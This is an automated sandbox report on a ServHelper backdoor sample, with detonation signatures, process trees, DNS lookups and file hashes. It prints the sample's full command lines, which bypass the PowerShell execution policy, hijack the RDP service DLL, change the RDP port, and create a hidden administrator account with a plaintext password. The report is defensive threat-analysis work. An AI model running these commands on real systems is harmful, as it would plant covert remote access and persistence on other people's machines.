Malware Analysis Report

2024-08-06 05:35

Sample ID 240410-l3c3esbf67
Target 282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8
SHA256 282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8
Tags
servhelper backdoor discovery exploit persistence trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8

Threat Level: Known bad

The file 282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8 was found to be: Known bad.

Malicious Activity Summary

servhelper backdoor discovery exploit persistence trojan upx

ServHelper

Grants admin privileges

Sets DLL path for service in the registry

Modifies RDP port number used by Windows

Possible privilege escalation attempt

Modifies file permissions

Checks computer location settings

Loads dropped DLL

Deletes itself

UPX packed file

Drops file in System32 directory

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Program crash

NSIS installer

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Delays execution with timeout.exe

Modifies registry key

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious behavior: LoadsDriver

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Account Manipulation
T1098
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Privilege Escalation
TA0004
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Defense Evasion
TA0005
Modify Registry
T1112
File and Directory Permissions Modification
T1222
Credential Access
TA0006
Discovery
TA0007
Query Registry
T1012
System Information Discovery
T1082
Lateral Movement
TA0008
Remote Services
T1021
Remote Desktop Protocol
T1021.001
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-04-10 10:03

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-10 10:03

Reported

2024-04-10 10:05

Platform

win10v2004-20240226-en

Max time kernel

92s

Max time network

128s

Command Line

"C:\Users\Admin\AppData\Local\Temp\282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe"

Signatures

ServHelper

trojan backdoor servhelper

Grants admin privileges

Modifies RDP port number used by Windows

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Sets DLL path for service in the registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" C:\Windows\system32\reg.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\rfxvmt.dll C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\Basebrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\shellbrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1604 wrote to memory of 5028 N/A C:\Users\Admin\AppData\Local\Temp\282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe C:\Windows\System32\cmd.exe
PID 1604 wrote to memory of 5028 N/A C:\Users\Admin\AppData\Local\Temp\282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe C:\Windows\System32\cmd.exe
PID 5028 wrote to memory of 1836 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\timeout.exe
PID 5028 wrote to memory of 1836 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\timeout.exe
PID 5028 wrote to memory of 4472 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5028 wrote to memory of 4472 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4472 wrote to memory of 4348 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 4472 wrote to memory of 4348 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 4472 wrote to memory of 3980 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 4472 wrote to memory of 3980 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 4472 wrote to memory of 4992 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 4472 wrote to memory of 4992 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 4472 wrote to memory of 2108 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 4472 wrote to memory of 2108 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 4472 wrote to memory of 4828 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 4472 wrote to memory of 4828 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 4472 wrote to memory of 4876 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 4472 wrote to memory of 4876 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 4472 wrote to memory of 3672 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 4472 wrote to memory of 3672 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 4472 wrote to memory of 2208 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 4472 wrote to memory of 2208 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 4472 wrote to memory of 412 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 4472 wrote to memory of 412 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 4472 wrote to memory of 4104 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 4472 wrote to memory of 4104 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 4472 wrote to memory of 3568 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 4472 wrote to memory of 3568 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 4472 wrote to memory of 232 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 4472 wrote to memory of 232 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 232 wrote to memory of 3396 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 232 wrote to memory of 3396 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4472 wrote to memory of 3492 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4472 wrote to memory of 3492 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3492 wrote to memory of 2676 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3492 wrote to memory of 2676 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2676 wrote to memory of 5072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2676 wrote to memory of 5072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 5072 wrote to memory of 3292 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 5072 wrote to memory of 3292 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4472 wrote to memory of 4976 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4472 wrote to memory of 4976 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4976 wrote to memory of 4848 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4976 wrote to memory of 4848 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4848 wrote to memory of 316 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 4848 wrote to memory of 316 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 316 wrote to memory of 1892 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 316 wrote to memory of 1892 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2168 wrote to memory of 4376 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 2168 wrote to memory of 4376 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4376 wrote to memory of 4572 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4376 wrote to memory of 4572 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4792 wrote to memory of 4448 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4792 wrote to memory of 4448 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4448 wrote to memory of 1244 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4448 wrote to memory of 1244 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2772 wrote to memory of 3660 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 2772 wrote to memory of 3660 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 3660 wrote to memory of 1252 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3660 wrote to memory of 1252 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1908 wrote to memory of 632 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1908 wrote to memory of 632 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 632 wrote to memory of 2744 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 632 wrote to memory of 2744 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe

Processes

C:\Users\Admin\AppData\Local\Temp\282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe

"C:\Users\Admin\AppData\Local\Temp\282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c timeout -t 15& powershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\evil.ps1

C:\Windows\system32\timeout.exe

timeout -t 15

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\evil.ps1

C:\Windows\system32\takeown.exe

"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\system32\net.exe

"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\system32\cmd.exe

cmd /c net start rdpdr

C:\Windows\system32\net.exe

net start rdpdr

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start rdpdr

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\system32\cmd.exe

cmd /c net start TermService

C:\Windows\system32\net.exe

net start TermService

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc Ghasar4f5 /del

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc Ghasar4f5 /del

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc Ghasar4f5 /del

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc WqajC1V5 /add

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc WqajC1V5 /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc WqajC1V5 /add

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" SLVJLBBW$ /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" SLVJLBBW$ /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" SLVJLBBW$ /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc WqajC1V5

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc WqajC1V5

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc WqajC1V5

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

Network

Country Destination Domain Proto
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 19.53.126.40.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 17.143.109.104.in-addr.arpa udp
US 8.8.8.8:53 dfsrakizimoy34ggf.xyz udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\nsg2F3F.tmp\blowfish.dll

MD5 5afd4a9b7e69e7c6e312b2ce4040394a
SHA1 fbd07adb3f02f866dc3a327a86b0f319d4a94502
SHA256 053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae
SHA512 f78efe9d1fa7d2ffc731d5f878f81e4dcbfaf0c561fdfbf4c133ba2ce1366c95c4672d67cae6a8bd8fcc7d04861a9da389d98361055ac46fc9793828d9776511

C:\Users\Admin\AppData\Local\Temp\nsg2F3F.tmp\System.dll

MD5 fbe295e5a1acfbd0a6271898f885fe6a
SHA1 d6d205922e61635472efb13c2bb92c9ac6cb96da
SHA256 a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1
SHA512 2cb596971e504eaf1ce8e3f09719ebfb3f6234cea5ca7b0d33ec7500832ff4b97ec2bbe15a1fbf7e6a5b02c59db824092b9562cd8991f4d027feab6fd3177b06

C:\Users\Admin\AppData\Local\Temp\nsg2F3F.tmp\nsUnzip.dll

MD5 77a26c23948070dc012bba65e7f390aa
SHA1 7e112775770f9b3b24e2a238b5f7c66f8802e5d8
SHA256 4e4e429ecf1c49119a21c817899f64152b03b41b036fc1d92aee335043364c43
SHA512 2e7ffa4ed5c97f555e1b0d6f55ffcfd53cd28302fc77d95fdaea89e0b6b42e67e366331e52358e78e8266d079cc2ca3ea4c909197fb38a5b4c8151c7678d0065

memory/4472-46-0x00000255F0F40000-0x00000255F0F62000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0j5p2fet.otl.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4472-51-0x00007FF97E210000-0x00007FF97ECD1000-memory.dmp

memory/4472-52-0x00000255F0FC0000-0x00000255F0FD0000-memory.dmp

memory/4472-53-0x00000255F0FC0000-0x00000255F0FD0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\evil.ps1

MD5 71378b4f0b781d534492988926cfb758
SHA1 db6c0e67a5b9a2932f071ee9e165658aa4950bf6
SHA256 1c88620ce8a15c57b1ca64da67cf995f1a3ce3aeef6087d90f6cff772fbf2614
SHA512 62f2475e7284ac7bf480edf5e60d6438e4aa4a8666a0d15694ba2e7ce7fb77629baed27c076f92720373251d97c6501a5ce21c91c7f0040d5fd4dfe92a9c45f4

memory/4472-55-0x00000255F0FC0000-0x00000255F0FD0000-memory.dmp

memory/4472-56-0x00000255F0FC0000-0x00000255F0FD0000-memory.dmp

C:\Windows\system32\rfxvmt.dll

MD5 dc39d23e4c0e681fad7a3e1342a2843c
SHA1 58fd7d50c2dca464a128f5e0435d6f0515e62073
SHA256 6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA512 5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

memory/4472-72-0x00007FF97E210000-0x00007FF97ECD1000-memory.dmp

memory/4472-73-0x00000255F0FC0000-0x00000255F0FD0000-memory.dmp

memory/4472-74-0x00000255F0FC0000-0x00000255F0FD0000-memory.dmp

memory/4472-75-0x00000255F0FC0000-0x00000255F0FD0000-memory.dmp

C:\Windows\Branding\mediasrv.png

MD5 34c833d9f05fa3ff36ad6256164f8510
SHA1 7f50ab402b023f751af95869d1c7789c864f77fb
SHA256 af2f4f3f3a34bfe56243b2419d0d494c48fbb38502395fc9a726f27737e6a178
SHA512 284edfce8fc6b9bfbe74b770492f8a592a284851d8fa59044147eea80aaaec35f29a4c90a39a1bca89e59f46bd943483b64eedd843a9e23533c82cd768205b93

C:\Windows\Branding\mediasvc.png

MD5 d81ea89ae878fcfc33accae038a14016
SHA1 aafe059a73426ac3878724c9e713d58e8162ad3d
SHA256 978726f716f0b882d237e7120e0d6ae5ec69f0999e4dd5a5f24f152858d2ac00
SHA512 1568370943476b1bb1a45eb8631156bc53c973d77de2e560b1f66dd9223631d9504e6869e4311967a8aa87900b7bf0b39addc336ec02624403085991cec41d40

\??\PIPE\lsarpc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\uninst.dat.log

MD5 0a9acbe50c9af249014e877216e99f4c
SHA1 f79c9d8a1442634f130ffb5359e3502829c5b92f
SHA256 8183b668099930ea6f5bbdba89e67057499a28766cd61cf630642e0dfb4e4047
SHA512 8e79f88ae39e1f741eee33e9c2f0cc595b120a5260ba96790f5a6b90a4ce4dc5ff9e576e56708393c215fdd54964a04ee498795a482194b3c59800ea49925a33

memory/4472-83-0x00007FF97E210000-0x00007FF97ECD1000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-04-10 10:03

Reported

2024-04-10 10:05

Platform

win10v2004-20240226-en

Max time kernel

93s

Max time network

96s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4320 wrote to memory of 2008 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4320 wrote to memory of 2008 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4320 wrote to memory of 2008 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 2008 -ip 2008

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2008 -s 612

Network

Country Destination Domain Proto
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-04-10 10:03

Reported

2024-04-10 10:05

Platform

win10v2004-20240226-en

Max time kernel

147s

Max time network

156s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\blowfish.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2444 wrote to memory of 3548 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
